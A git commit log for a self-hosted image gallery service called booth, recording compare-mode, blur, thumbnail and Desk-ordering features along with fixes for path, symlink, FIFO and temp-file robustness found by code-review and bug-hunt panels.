Commit Graph
100 Commits
Author SHA1 Message Date
vh d54bb04414 fix(r3): a NUL in the raw file path is a 404, not a 500
Compare's stages load their pictures through the catch-all file route, which
caught only OSError around resolve(); an embedded NUL raises ValueError. Same
class as resolve_booth's fix in f8d136a (heid bug hunt on the race fix,
hulda). The upload route's NUL-in-filename 500 is the same class and is left
to booth-dev: it is not on compare's path.
2026-09-24 16:33:27 -07:00
vh 64b403f7eb test(r3): re-anchor the review's C-key row on the guarded handler 2026-09-24 16:00:01 -07:00
vh 8633b1dded fix(r3): judge each rel once per request — a side or review item that vanishes mid-request never 500s
booth-dev's race note after the merge: the compare route resolved each side
in _compare_side and again in _compare_ring, then ring.index(a) raised if the
file vanished (or was relinked outside the booth) between the two; the review
did the same through cring.index(f). The compare ring is now built once and
the sides are judged by membership of it. The review re-judges its item and
scans forward for the next comparable one (usually one step, no longer a
resolve of the whole ring per render); an item no longer comparable renders
the review without a Compare control, and C does nothing.

The contract records the once-per-request rule and that the phone-width wrap
covers doc.html's bar too. r3.toml: 59 rows, four re-anchored.
2026-09-24 15:59:43 -07:00
vh cf08ae3f33 docs(roadmap): r3 landed — the compare ring and stepping rules, compare mode off the parking lot
The stale v1.1 line for compare pairing is corrected to the 2026-09-24
ruling (pairs are picked, never detected). persistent-memory records r3
live and unpushed, and the open race note for design-dev.
2026-09-24 15:57:42 -07:00
vh f8d136a521 fix(r3): fold heid's bug hunt — no link offers a pair that 404s, NUL booth names, a FIFO marker, encoded view-state names
Navigation was built from the review ring while the compare GET also demands
containment, so an outside symlink (which stays in the ring) was offered by
the strip, the steps, the review's Compare control and the flag landing, and
404ed on arrival. Every one is now built from the compare ring (the review
ring filtered by the same conjunction, _in_booth).

Two pre-existing gaps compare inherits, fixed at the source: resolve_booth
caught only OSError, so a NUL in the booth segment was a 500; record_view
opened its marker blocking, so a planted FIFO hung every look. Plus: the page
treats %73ide=a as side=a, and the subgrid engine floor is stated. Two
findings refuted (a chorded click mid-drag never fires pointerup, measured;
booth_items never yields an unquotable rel). r3.toml: 57 rows.
2026-09-24 14:39:06 -07:00
vh 23f1bdb41f fix(r3): fold heid's code review — equal stage widths, the axis guard, players, and tests that read the observable
The one drift: the separator was a border on B, making B's stage 1px
narrower than A's; it is now a 1px column gap, so the stages are the same
size to the pixel. Tests now read what the contract promises instead of a
proxy: the strip's ring order, the full bakeoff sequence, 1:1 and Fit by
geometry, the 900px break from both sides, A wrapping, each form naming its
own item, a sibling-prefix symlink, both reveals, the strip's flag, the back
arrow unlinked, a one-axis picture, a focused player, two videos with no
toggle. The contract names .cmp-cap, a press on a stage, INV-4's URL-driven
picker and the redirect branch's isinstance check. r3.toml gains ten rows.
2026-09-24 13:54:29 -07:00
vh 8c7fe77841 feat(r3): compare — two picked rels side by side, linked stepping, synced pan, flag the winner
GET /b/{name}/compare with the conjunction 404 (containment AND the review
ring), both sides recorded as seen, view state (side, link) mapped from a
closed set onto every link, side-keyed regions, and back=compare in
_mark_redirect. compare.html: two stages sharing one set of rows, the strip
as picker (the side active now), linked and per-side stepping, X/L/Z/A/B/C
keys under the review's guards, synced pan by fraction with an echo guard,
per-side blur reveals, JS-off parity.

The stage machinery moves out of view.html into _stage_js.html
(BoothMode.bind, BoothStage.attach), shared by the review and compare. The
review gains a Compare control and a C key. At phone width a full top bar
wraps.

Tables: r2c's 15 stage rows re-pointed to _stage_js.html; r2b's phone
top-bar row re-anchored (the wrap made it vacuous alone); new r3.toml. The
contract records the wrap, equal stages and C on the compare page.
2026-09-24 13:26:11 -07:00
vh 5d785fe3c4 docs(contract): r3 compare — two picked items side by side, linked stepping, synced pan, flag the winner
Restores the contract as it stood at 1593ea2 (proposed a8428dc, booth-dev's
seam pass folded ebd7729/33d9175/05ad6c4, heid's contract panel folded
1593ea2). Those commits lived only in a work clone under /tmp, which the
2026-09-24 reboot wiped; the text is unchanged.
2026-09-24 13:19:22 -07:00
vh 47b39bca53 memory: snapshot for context clear — waiting on design-dev's r3 contract 2026-09-24 08:27:31 -07:00
vh d5ead3f613 memory: the operator kept 768-wide thumbnails 2026-09-24 08:20:50 -07:00
vh 8a78a9bd1d fix(blur): writes are strict, so a set the writer cannot read is never overwritten
groa's late retry on the blur bug-hunt, adjudicated against the landed code.
Its four bugs were already fixed, but a robustness note (mkstemp's 0600 locks
out a reader under another uid, which then "sees nothing and replaces it")
pointed at a real gap. set_blurred built on read_blurred, the renderer's
lenient reader, which turns an unreadable, oversized or malformed
`.blurred.json` into an empty set. The writer then replaced the file, and
whatever it held was gone. This is the `.marks.json` wipe of 2026-09-21 in a
new module, and it shipped for a night.

- `_load` is the one parse with two postures. read_blurred maps its refusal to
  "nothing blurred" (a damaged file costs the blur, never the page).
  set_blurred lets it raise BlurUnwritable, which the route answers with 409
  and the CLI with exit 3, and changes nothing.
- It refuses only for a REGULAR file it cannot read. A link, a directory or a
  FIFO at either name holds no set anyone wrote, so it reads as empty, and the
  postcondition judges whether the write can land: a link is replaced, a
  directory refused.
- The file is 0644 again, as the line-format writer left it (fchmod after
  mkstemp).

The open flags in `_read_capped` became a second layer behind the new lstat
check, and the mutation run caught their rows VACUOUS through the public API.
They are now held to account by direct tests, because they still close the
lstat-to-open race. blur_storage.toml: 25/25. No second panel was run: this
folds one reviewer note plus the repo's own recorded lesson, with a test and
a proved row for each behaviour.
2026-09-24 00:56:25 -07:00
vh 7d4a26f486 memory: r2c live, the push, and a relayed approval that was held 2026-09-24 00:33:41 -07:00
vh fde082e733 merge(r2c): the review stage fills, its arrows sit at the picture, 1:1 pans
design-dev's r2c round, merged on the operator's direct approval. It answers
his ask from 2026-09-23: fit and 1:1 modes, arrows at the image's edge rather
than the stage's, and click-and-pan in 1:1 with native image drag defeated.

- Fit fills the stage, up or down, with or without JS; 1:1 is natural pixels,
  and every pixel is reachable. The operator ruled that Fit may enlarge.
- The toggle shows for every picture. The mode lives on <html> as `stage-one`,
  set by the head script before the stage exists, so a 1:1 reel never flashes
  Fit. It persists per viewer in localStorage (inside a try) and follows other
  tabs.
- The arrows sit 8px outside the drawn picture, clamped inside the stage.
- 1:1 drag-to-pan: grab convention, a 4px threshold, pointer capture, and the
  picture is not draggable.

Templates only (view.html, base.html); no server change. The two test changes
are declared in r2c_review_stage.contract.md: the r2b reveal test asserts "no
blur" (Fit keeps a drop shadow), and the r2_flow 360px-arrow row is retired
with successors in r2c.toml. Contract panel and both code panels 4/4.
2026-09-24 00:30:05 -07:00
vh 7c879e6038 fix(review): the heid code-review and bug-hunt panels on r2c, folded (both 4/4 with retries)
- 1:1 start-aligns. The centred flex item overflowed both sides and the
  start was unreachable; measured, a 3000px picture hid its leftmost
  980px. Auto margins still centre a small picture.
- Drag lifecycle: a move with no button ends the drag, so a press
  released outside the stage never pans on a later hover. Capture is now
  load-bearing in a test. The threshold is 4px of total movement.
- A press on the stage's own scrollbar is never a pan. The arrows clamp
  to the stage's client box, so they are never under a classic
  scrollbar. The test runs a browser without --hide-scrollbars and
  asserts the gutter exists.
- Stacked, the arrows' CSS spot is the stage's centre (30vh), set in
  view.html because base.html lost to the page's later rule.
- The stage reveal is `hidden` until bound, and keeps Fit's drop shadow
  when revealed. A blurred picture composes blur() drop-shadow().
- The mode follows another tab. A failed or unknown size returns the
  arrows to their CSS spot.
- Tests: object-position, vertical centring, the Fit half of
  aria-pressed, a storage read that throws, a large picture's toggle,
  Fit forgetting 1:1, single-axis pan.
- Declared: the r2b reveal test reads "no blur" (the shadow stays), and
  the r2_flow 360px-offset row is retired.

Mutation tables 137/137 across four. 810 passed.
2026-09-24 00:20:15 -07:00
vh 7151a45ec2 feat(review): the review stage fills, its arrows sit at the picture, 1:1 pans (r2c)
The operator: "fit and 1:1 modes as well as moving the forward and back
arrows closer to the edge of the image ... mouse click and pan for 1:1
mode if it exceeds page width (defeat drag drop of image)". Ruled: "Fit
may enlarge."

- Fit: the picture's box is the stage's inner box, and object-fit: contain
  draws it whole at the largest size that fits, up or down, never
  cropped. It works with or without JS. 1:1 is natural pixels.
- The Fit | 1:1 toggle shows for every picture; the per-picture hide is
  gone. It stays hidden without JS.
- The mode persists as `stage-one` on <html>, set by the head script
  before the stage exists, so a 1:1 reel never paints a stage in Fit.
  Anything stored but "one" reads as Fit. Storage never raises.
- The arrows sit wholly outside the DRAWN picture (near edge 8px),
  clamped 8px inside the stage. They sit over the picture only when it
  spans the stage, and never over the rail. They are re-placed on load,
  resize, mode switch and 1:1 scroll, and keep their CSS spot until the
  drawn box is known.
- 1:1 drag-to-pan when the picture overflows either axis: the picture
  follows the pointer, a 4px threshold, pointer capture, grab/grabbing.
  The picture is draggable=false. The stage's reveal button moves out of
  the scrolled content to sit over the stage (a pan carried it off), so
  no control is a pan source.

Contract docs/contracts/r2c_review_stage.contract.md (heid contract
panel 4/4 folded; it changed the no-flash mechanism). Declared test
changes: the Nyx stage-edge arrow test is replaced; the stage class and
the toggle's `hidden` are updated. tests/mutations/r2c.toml 16/16. 803
passed.
2026-09-24 00:20:15 -07:00
vh 0781aa5ee5 docs: a GET of a booth page records a look, so live checks must not sweep :8090
Two sessions' post-deploy sweeps on 2026-09-23 recorded a look at every booth,
which emptied "new since you looked" and collapsed the Desk's last section
into reverse name order. CLAUDE.md now says how to check the live service
without recording anything, and persistent-memory records the Desk ruling and
the three booths it hid.
2026-09-23 23:08:19 -07:00
vh 1d31ab05de merge(thumbs): thumbnails sized for the tile's width at 2x, and a cache that cannot be planted
Operator-approved 2026-09-23 ("fix it, one bigger thumbnail"), after his
report that sindra-nude-final looked "blurry until selected". c2b1454 sizes
thumbnails at 768 wide (the widest desktop tile, doubled for a 2x screen) and
caps them at 4096 tall. A browser test holds the number against the rendered
grid. c19d8c9 folds the heid bug-hunt (4/4 arms, five seat-executed probes):
cache hits must be regular files carrying the source's exact mtime, the cache
dirs never follow a link, the temp file is mkstemp, palette alpha and EXIF
orientation survive, and there is a 64 MP decode budget. 828 passed on the
branch; thumbs.toml 14/14.
2026-09-23 23:07:07 -07:00
vh 6880ab3059 merge(blur): the blur set round-trips any rel, in .blurred.json, with one writer
Operator-ruled 2026-09-23 ("fix the blur"). 4cfbce5 is the fix: a JSON-array
blur set through stdlib-only booth/blur.py, shared by the service and `booth
blur`, plus Item.blurred_self so blur state has one reader. c1f5543 folds the
heid bug-hunt on it (hulda, regin, kimi). The format moves to its own name,
.blurred.json, because sniffing one file for two formats recreated the
wrong-item bug. The writer is judged by its reader, so a planted directory is
a 409 and not a 500. A lone surrogate is dropped, the writer respects the
reader's size cap, and the route and the CLI share one check_rel predicate.
853 passed on the branch; blur_storage.toml 20/20.
2026-09-23 23:07:07 -07:00
vh c19d8c9718 fix(thumbs): fold the heid bug-hunt: a cache that cannot be planted, alpha, orientation
The heid bug-hunt panel on c2b1454 (4/4 arms, five seat-executed probes). The
new size rules governed only cache MISSES; the hit path trusted a name and an
mtime, inside a directory any fleet session can write into.

- A cache hit is a REGULAR file (lstat) carrying its source's EXACT mtime (4/4).
  A planted directory at the cache path was returned as the thumbnail, and a
  source replaced by `cp -p` or an archive extract kept an older stamp that
  `>=` served forever. The encoder now stamps the thumbnail with the source's
  mtime, so any change to the source is a miss.
- The cache directories are made component by component and never through a
  link (seat P4). A `.thumbs` planted as a link put the cache outside the
  booth, beyond the sweep. The booth-mtime restore now keys on creating
  `.thumbs` itself.
- The temp file is mkstemp (4/4, seat P5). The old `<out>.<pid>.tmp` was
  predictable, and a link planted there made the encoder overwrite its target
  (600 B became 316,400 B).
- Palette transparency survives (3/4, seat-executed, and INTRODUCED by
  c2b1454). The fits-but-heavy branch newly re-encoded palette PNGs, and
  getbands() of mode P has no A even with tRNS.
- EXIF orientation is honoured for sizing and for the saved image (groa,
  seat-verified). A camera portrait stored sideways was sized and tiled as a
  landscape.
- A 64 MP decode budget (2/4). A header claims any size, and a failure is not
  cached, so every request re-decoded it.
- The cache name carries the whole rule: width, height cap, quality and an
  encoding version (groa). The width alone would have served stale bytes after
  a quality change.

Declined: the utime-restore failing on a foreign-owned booth (booths are the
service user's), and regin's two solos (the THUMB_MAX export is not imported
anywhere; the live fixture is function-scoped). thumbs.toml: 14/14 proved.
2026-09-23 23:06:45 -07:00
vh c1f5543b77 fix(blur): fold the heid bug-hunt: two file names, a reader-judged writer, one predicate
The heid bug-hunt panel on 4cfbce5 (hulda, regin, kimi; groa timed out) found
four real defects in the round-trip fix, and three of its arms converged on the
worst: it re-created the bug it existed to fix.

- Two names, never a sniffed file (3/3). JSON went into the OLD `.blurred`, and
  the reader guessed the format from the bytes, so a legacy file whose one line
  is an item named `["a.png"]` read as {"a.png"} and blurred the neighbour. The
  set now lives in `.blurred.json`, JSON only. The legacy `.blurred` is read as
  lines only, and only while `.blurred.json` is absent; the first write retires
  it, after the new file is in place.
- A planted directory is a 409, not a 500 (2/3 plus a third angle, executed by
  the seat). The reader was hardened against it and the writer was not:
  os.replace and unlink raised IsADirectoryError through the route. Now the
  writer is judged by its reader: set_blurred re-reads after writing and raises
  BlurUnwritable unless the set on disk is the set asked for. That one check
  covers a directory at either name, a permission and a race.
- A lone surrogate is dropped on read (hulda, executed). `"\ud800"` is a valid
  JSON string that no filename can produce, and the UTF-8 encode raised on it
  at every later write.
- The writer respects the reader's size cap (2/3). Nothing capped the write,
  and the reader reads an oversized file as EMPTY, which reveals everything.
- One predicate, check_rel, for the route and the CLI (2/3). The CLI's `*..*`
  substring guard refused `a..b.png`, which the route accepts. It also refuses
  an empty path now (regin, kimi), and every item is checked before any is
  written.
- `booth blur` fails closed, with a message and exit 3, when its package is
  missing (kimi), as `link` already does.

Declined, with reasons: the Item positional-constructor break (booth_items is
the only constructor, INV-1), the fdopen fd leak and the short read (not
constructible on a local filesystem, and the `.seen` shape), and
unreadable-reads-as-revealed (blur is cosmetic; the `.seen` posture).
blur_storage.toml: 20/20 proved. One row came back VACUOUS on its first run,
because `set() or X` is X, and was rewritten before counting.
2026-09-23 23:01:18 -07:00
vh 64f64889a2 fix(desk): "everything else" is last UPDATED first, not last activity
The operator, on the live Desk: "how is this last activity first?" It was not,
usefully. The section sorted by `_newest_mtime`, which counts a look (`.viewed`),
so opening a booth moved it up. Tonight two post-deploy checks fetched every
booth page within half a second, which recorded 22 looks at once and collapsed
the section into reverse name order through the (mtime, name) tie-break.
Meanwhile each row shows "updated X ago", which is `landed_at`, a different
clock from the one the list was sorted by.

Operator ruling: "last activity can just be last time the booth was updated,
not necessarily operator's last activity." The section now sorts by
`(-landed_at, name)`, the date the row shows, labelled "last updated first".
Looking, flagging and blurring no longer move a booth. `list_booths` keeps its
own order for its other readers, and `_newest_mtime` still feeds lifetime.

The r2_flow contract (§3, the ordering table, INV-5) and ROADMAP's ordering row
are amended to match. Two tests and two r2_flow.toml rows cover it (25/25).
2026-09-23 22:55:10 -07:00
vh c2b1454358 fix(thumbs): size thumbnails for the tile's width at 2x, not 512 on the long side
The operator on sindra-nude-final: "the images look blurry until they're
selected and blown up." The cap was 512px on the LONGEST side, which the
comment called "comfortably above any tile size", and it was, for a square. A
gallery tile is sized by its WIDTH, though, and a 704x1408 portrait got 256px
of width for a tile Chromium renders at 361 CSS px. That is 1.4x stretched at
1x density and 2.8x on a 2x screen. The review stage serves the original,
which is why it looked sharp once opened.

- THUMB_WIDTH = 768: the widest desktop tile (3 columns, 1440px and up,
  measured at 321-361 CSS px across viewports) doubled for a 2x screen.
  THUMB_HEIGHT_MAX = 4096 stops a long screenshot going through at full height.
- An original that fits the bounds is served as-is only when it is also light
  (<= 64 KB; 768-wide thumbnails average 39 KB over the 381 live images) or
  animated, since a thumbnail is one frame. Fitting a tile in pixels is not
  being cheap in bytes: these portraits are ~1.1 MB PNGs.
- The size rule is in the cache name (`<rel>.768w.webp`). The live 512-cap
  thumbnails are newer than their sources, so the mtime check alone would have
  served them forever. The old files are orphans, swept with their booth.
- tests/test_thumbs_browser.py holds THUMB_WIDTH against the rendered grid at
  1440, 1920 and 2560. The constant is a layout number, and a redesign that
  widens the tiles turns it red instead of soft.

Measured cost, all 381 live images: 4.8 MB -> 14.2 MB of thumbnails, still ~27x
under the 386 MB of originals. Known limit: the 2-column (<=472px) and 1-column
(<=650px) reflows are softer than 768 covers at 2x. tests/mutations/thumbs.toml
proves 7 falsifiers.
2026-09-23 22:23:03 -07:00
vh 4cfbce5109 fix(blur): .blurred round-trips any rel, and one writer serves both surfaces
The heid bug-hunt on r2b merge 1 found the /blur route stripping `f` before
writing, so the form for " a.png" blurred its neighbour "a.png". The route was
only half of it: `.blurred` was one stripped rel per line, so no writer could
store a rel with a leading space or a newline, whatever the route did.
Operator-ruled 2026-09-23 ("fix the blur").

- booth/blur.py (new, stdlib-only): read_blurred / set_blurred / BLUR_FILE.
  `.blurred` is now a JSON array in sorted order, the `.seen` shape: opened
  O_NOFOLLOW | O_NONBLOCK with an S_ISREG check and a 1 MiB cap, so a planted
  symlink is refused and a FIFO can no longer hang every Desk render (the old
  read_text() blocked on one). Writes go through mkstemp + os.replace. The
  legacy line format is still READ, so the 6 live line-format files keep their
  blur until their next write upgrades them. Measured before the change: 42
  live rels, none with edge whitespace, so the defect had no live victims.
- The route no longer strips `f`.
- scripts/booth `blur`/`unblur` go through booth.blur.set_blurred instead of
  their own grep/printf line writer. Two writers of one format is how the
  formats drift, and after this change the shell writer would have appended a
  line to a JSON array. Every path is checked before anything is written.
- Item.blurred_self (appended to the record): the item's own blur, resolved in
  booth_items from the same read as `blurred`. It replaces build_gallery's
  second read_blurred, which a write between the two reads could split
  (invariant 3). app.py no longer reads blur state at all, and a test asserts
  it.

Names stay importable from booth.app and booth.items (invariant 4). blur joins
test_stdlib_only. test_cli's per-item-survives test now reads through the reader
rather than asserting the old byte format. The r2b contract and its mutation
row follow blurred_self onto the record. tests/mutations/blur_storage.toml
proves 12 falsifiers by running the change each forbids.

Not in this change, and still ours: the "off"-means-ON idiom drift between
/blur, /blurbooth and /flag (forms only ever send 0/1), and the CLI's
`.blurbooth` touch following a symlink where the service no longer does.
2026-09-23 22:05:18 -07:00
vh cce6a20abe merge(r2b): the Desk row, booth dates, and the theme toggle
design-dev's r2b merge 2 (D1 + D1b + D3), merged on the operator's approval
with both heid panels folded (code review and bug hunt, 4/4 each), landed after
merge 1 and its live check so a live regression points at one of the two.

436d234 is the feature. The Desk row gets an always-visible lifetime pill (kept,
held, counting), with zip / keep|release / wipe floating over the preview strip
on hover or focus and taking no room; on touch they are the row's last line.
Booth dates render on the row and the booth header from created_at (statx birth
time) and landed_at: four never-raise date filters in app.py, one `now` per
page, and a date the filesystem cannot give or the calendar cannot hold renders
nothing. The System / Light / Dark toggle is stored per viewer, applied before
first paint, and reaches the ask chrome embed.js mounts inside verbatim pages
(only the fragments it mounted; an author's own .bk-ask is never marked).
_svos_tokens.css is re-vendored at the same SVOS SHA with a scoping-only
transform.

1558a7f folds both panels.
2026-09-23 21:44:14 -07:00
vh b92b00215f merge(r2b): reveal all, and the booth blur control
design-dev's r2b merge 1 (D2 + D2b), merged on the operator's approval after
design-dev's "merge it" with both heid panels folded (code review and bug hunt,
4/4 each).

5ded5ff is the feature: a per-viewer "reveal all" for blurred items, and the
whole-booth fog control on the booth page, the review and the Desk. 75623c7
folds both panels, and two of its edits land in our code. set_booth_blurred no
longer touch()es through a planted .blurbooth symlink: anything already at the
name reads as fogged and nothing is written, otherwise it creates with
O_CREAT|O_EXCL|O_NOFOLLOW (the class record_view was hardened against).
booth_blur_all only redirects back to the review for a member of the review
ring, as the mark routes do.

20f1cb8 and ca0641f are test-only: opt-in Playwright traces for failing browser
tests, then a test browser with no internet in both fixtures, each with a
positive control (an external host fails fast, a Booth page still goes idle).
The flake's cause is NOT confirmed: 0 reds in 24 untraced runs after the change
is consistent with the fix but no trace ever caught the stalled request.
2026-09-23 21:41:46 -07:00
vh 1558a7fa07 fix(desk): the heid code-review and bug-hunt panels on r2b merge 2, folded
The bug hunt (4/4) and code review (4/4) were both clean on mechanism.
Their shared catch was the one-sided minute check.

Dates:
- The date filters never raise. One clock outside the calendar's range
  500'd the Desk for every booth, because every row renders in one
  response. An unrenderable date now renders nothing.
- "Updated" shows whenever it differs from "created" by a minute or more,
  either way. Copied content is often older than its folder.
- A clock ahead of now shows its date, never "just now".
- A day is 24h ("1d ago" never appeared).
The row:
- The controls are last in the markup, so the booth's name comes first in
  tab order and wipe last. The cluster is placed over the strip from the
  row's box.
The theme:
- A choice made in one tab moves the Booth's other open tabs.
- The theme mark goes only on ask fragments the embed mounted.
Tests, strengthened after the code review:
- the pill is visible at rest;
- keyboard focus reveals the controls;
- the controls act with scripts off;
- Reveal all reaches the doc page;
- the high-contrast check reads tokens that actually differ;
- the art-light extras are written from SVOS, not derived from the
  copies;
- two overstated mutation rows are replaced (one was a runtime no-op, one
  went red through a syntax error).
Contract amended.

r2b.toml 55/55 proved. 799 passed.
2026-09-23 20:03:32 -07:00
vh 436d234ca0 feat(desk): the Desk row, booth dates, and the theme toggle (r2b merge 2: D1 + D1b + D3)
Operator rulings, 2026-09-23.

D1, the Desk row:
- Kept vs ephemeral reads at a glance: an always-visible lifetime pill in
  the right column (sage ★ kept, amber held, ◷ counting down).
- The facts line is facts only.
- zip / keep|release / wipe are one cluster, with zip out of the middle.
  Where a real hover exists it floats over the preview strip (covering
  pictures, never information), appears on hover or keyboard focus, and
  takes no room. Anywhere else (touch, any coarse pointer) it is the
  row's last line, visible, with 32px controls. × hides too (the operator
  answered yes).
D1b: "created 12 Sep" (filesystem birth time; nothing when unknown) and
  "updated 5d ago" (the content clock), as <time> facts on the row and in
  the booth header, from one macro and one clock per page.
D3, the theme toggle: System · Light · Dark in the top bar.
- Stored in localStorage and applied in <head> before any stylesheet.
- System removes data-theme, so the OS query follows the OS live, with
  no listener.
- The token sheet is re-vendored at the same SVOS SHA with a scoping-only
  transform (155 declarations, the same set, both directions), so forced
  themes win over the OS and high contrast follows the theme in effect.
- The ask chrome inside verbatim pages follows the choice through
  data-bk-theme on our own fragments, live across tabs. The host page's
  <html> is never touched.

Declared test changes:
- two row tests replaced;
- the wipe-dialog test hovers first;
- four r2_flow rows retired, with successors in r2b.toml (45/45).
785 passed.
2026-09-23 19:25:32 -07:00
vh ca0641f55b test: the browser tests run with no internet
Every Booth page asks fonts.googleapis.com for its faces, and
wait_until="networkidle" waits for that request. A stalled request to
Google therefore held a page until goto's 30s timeout. That is the
failure the full-suite flake shows: Page.goto timeouts in tests far apart
within one run. A stalled font request reproduces it exactly.

Whether that was THE cause is not proven:
- 23 traced runs went green, against 1 red in 8 untraced;
- no trace captured the pending request.
A test that depends on Google being reachable is wrong regardless.

Both browser fixtures now launch Chromium with every hostname but
127.0.0.1 failing DNS at once. Pages fall back to the system font stacks
the tokens declare. Positive control in each file: an external host fails
with ERR_NAME_NOT_RESOLVED in under 3s, and a Booth page still goes idle.
Mutation-proved (r2b.toml 28/28). 776 passed.
2026-09-23 19:05:12 -07:00
vh 20f1cb8594 test: opt-in Playwright traces for browser tests that fail
The browser tests flake under full-suite load only; every failing test
passes alone. BOOTH_TRACE=1 keeps a full trace (screenshots and DOM
snapshots) for each browser test that fails. BOOTH_TRACE=light keeps
actions and network only, because the full mode perturbs the timing it
watches: 0/8 red traced against 1/8 untraced on the same tree. Off by
default. Positive control: a deliberately failing test keeps a trace,
and a passing one keeps nothing.
2026-09-23 18:41:32 -07:00
vh 75623c7dbc fix(blur): the heid code-review and bug-hunt panels on r2b merge 1, folded
Both panels ran 4/4 on 5ded5ff. They converged on the board and doc-page
gaps independently.

- A board holding files lost both blur controls (they sat inside the
  board suppression meant for the one-click wipe), while its items'
  "◉ booth" labels pointed at them. Only the wipe is board-suppressed now.
- A blurred doc's own full page rendered clear. Its body is blurred there
  too, with its own reveal and a Reveal all to put the blur back.
- set_booth_blurred followed a planted .blurbooth symlink (`touch`), and
  the new control made that a click away. Anything at the name already
  reads as fogged; otherwise it is created O_CREAT|O_EXCL|O_NOFOLLOW.
- The fog landing echoed `back` unchecked into the 303. It is now built
  from the review ring, as the mark routes do.
- The fog form is its own region, so an in-place save refreshes its
  label. Reveal all stays outside every region: its state lives in the
  tab.
- The review's Space-to-advance no longer swallows Space on a focused
  button or link.
- Top-bar controls stay on one line at phone width.
- Tests tightened:
  - method="post" on the fog forms;
  - exact blur values;
  - a storage READ that throws;
  - an item's own reveal carried across a swap;
  - reveal gated where it can act.

r2b.toml: 26/26 proved. 774 passed.
2026-09-23 18:41:32 -07:00
vh 37d859c0fd memory: snapshot for context clear — the arc mid-flight, and the one thing that blocks
In-flight rewritten to what is actually live: design-dev's blur merge is HELD
at 5ded5ff awaiting his explicit 'merge it' ping (both panels dispatched 17:53,
unfolded), the redesign and thumbnails and dates are shipped, and the browser
suite is flaky under load and NOT fixed.

Two detail files added. The dates one is the reusable lesson: three plausible
proxies for a creation date were considered and one was nearly built, and the
real answer was a syscall away — the system already recorded what looked
unavailable. One of the rejected proxies was write-on-read, a shape this repo
had finished paying for hours earlier.

The flake entry is written as OPEN with its limits stated: three tests, two
real defects fixed, neither proven causal, and n=3 cannot show an improvement.

Recent decisions and Tried and abandoned preserved intact (49->51 by addition,
7 unchanged); the index is back under the soft cap at 141 lines from 285, all
of the reduction from settled history leaving the volatile section.
2026-09-23 17:56:50 -07:00
vh 5ded5ffe55 feat(blur): reveal all, and the booth blur control (r2b merge 1: D2 + D2b)
The operator ruled blur A, and made it urgent: "per booth blurring is now
important since we are showing up to 4 images."

- Reveal all: one control per booth, in the booth header and the review's
  top bar, outside every data-region. It is in the markup only when
  something is blurred, always `hidden` until the script shows it.
  - The state is sessionStorage per booth, per tab, and nothing reaches
    the server. It is carried as one `reveal-all` class on <html>, applied
    before first paint from the page's own data-booth, so booth A's reveal
    cannot follow you into booth B and the index is never revealed.
  - Per-item reveal buttons stand down by stylesheet, and an item's own
    reveal is never touched, so "blur again" restores each item as it was.
  - A storage write that throws still applies the click.
- The booth blur control: a plain form to booth-dev's POST /blurbooth, so
  it works with scripts off. Its label follows is_booth_blurred; from the
  review it carries `back` and lands on the same item. A fogged booth's
  Desk row says "◉ blurred".
- Found by rendering it: under a fogged booth every item reported
  `blurred`, so an item blurred only by the booth offered an un-blur that
  visibly did nothing. The gallery now carries `blurred_self`, and such an
  item shows "◉ booth", a label rather than a control.

Contract docs/contracts/r2b_desk_reveal_theme.contract.md (heid contract
panel 4/4, folded). tests/mutations/r2b.toml: 14/14 proved. 765 passed.
2026-09-23 17:52:33 -07:00
vh 091f4b5f2d feat(dates): creation and update times for every booth, from the filesystem
The operator: "I think I want creation and update dates on the booths now too."

UPDATE was already there — `landed_at`, the newest mtime among CONTENT
excluding our own machinery, which the Desk already sorts "new since you looked"
by.

CREATION had no honest source. `.booth.json` carries a declared `created`, but
only for booths posted through the CLI since U5 — TWELVE OF THIRTY live booths
had none. Every alternative was a guess wearing a fact's clothes: oldest content
mtime is wrong the moment an agent copies files with timestamps preserved;
directory mtime is just "last thing added", which is landed_at renamed; and
stamping a first-seen marker on read is the same write-on-read shape that spent
an hour of today aging the booth it cached.

ext4 records a real birth time. CPython does not expose st_birthtime on Linux,
so booth/birthtime.py reads it through statx(2) — a fact the disk already holds
rather than one we invent. Verified against stat(1) on live booths, 6 of 6
exact, including every booth with no manifest. ONE rule for all thirty, which is
what invariant 6 asks of anything statable in a line.

None when the filesystem cannot say (tmpfs, NFS, an old kernel), and None
renders as nothing — the honest output when nobody knows. Never raises:
list_booths calls it once per booth on every index load, so a read that can
raise is a service-wide outage wearing a single-booth bug's clothes.

ALSO TWO REAL TEST-HARNESS DEFECTS, found chasing a flake and fixed on their
merits rather than because they were proven to be the cause:

- The keyboard-flag browser test fired ArrowRight and `f` back to back,
  assuming the first had finished — and focus() does a scrollIntoView, so under
  load `f` could arrive with no cursor and flag nothing. It now waits for the
  cursor to land.
- BOTH browser fixtures did bind -> getsockname -> CLOSE -> hand uvicorn the
  port NUMBER, leaving a window for the kernel to give that port to somebody
  else. This suite runs two browser files that each start a server per test, so
  the competitor is right there. The bound socket is now handed over directly.

⚠ THE FLAKE IS NOT PROVEN FIXED. Two different browser tests failed once each
across full-suite runs while passing 3/3 and 5/5 in isolation; since the fixes,
one failure in three runs. n=3 cannot distinguish that from the prior rate and
this commit does not claim it does.

770 green on a clean run.
2026-09-23 17:48:30 -07:00
vh cecd877f60 memory: the design arc mid-flight — blur landed, UI pending, and what not to do
A fresh session needs four things that are not derivable from the code: that
design-dev is shipping in two merges with blur first, that the booth-blur
storage and CLI are already landed so only the control is missing, that the Desk
exposes 84 images across 22 booths on the first page (which is WHY blur got
re-prioritised), and that the operator explicitly declined to have the
sindra-nude-* booths blurred on his behalf.

Also records that the hover ruling only looked like it reversed design-dev's
argument — he resolved it with @media (hover: hover) rather than anyone being
overruled, so it should not be re-raised as a conflict.
2026-09-23 17:27:09 -07:00
vh a9e71108a7 feat(cli): booth blur <name> with no files fogs the whole booth
The operator: "per booth blurring is now important since we are showing up to 4
images."

The Desk is why. Measured on the live set: 84 images across 22 booths on the
page he opens first, 10 of them blurred. Before the redesign the index showed
one cover per booth; four-up multiplies the exposure by four, and NOTHING POSTED
BEFORE THE REDESIGN OPTED INTO THAT.

The storage landed with the flag; this is the half that makes it usable before
design-dev's control ships. Seventeen handles call this script, so a session
posting sensitive work can self-blur AT POST TIME — which is the durable fix,
because the operator should not have to police 22 booths by hand.

No files named means the whole booth, which is the mental model already: `blur
<name> <file>...` was per item and required two arguments, so one argument could
only ever have been an error. COMPOSES with the per-item list: `unblur <name>`
clears the flag and leaves individual choices exactly as they were, the same
promise the resolver makes.

Also records both rulings routed this turn: x hides with the other Desk
controls, and the theme toggle reaches the chrome inside verbatim pages.

Verified under the system python3 with no venv, which is the only way most
callers ever run it.
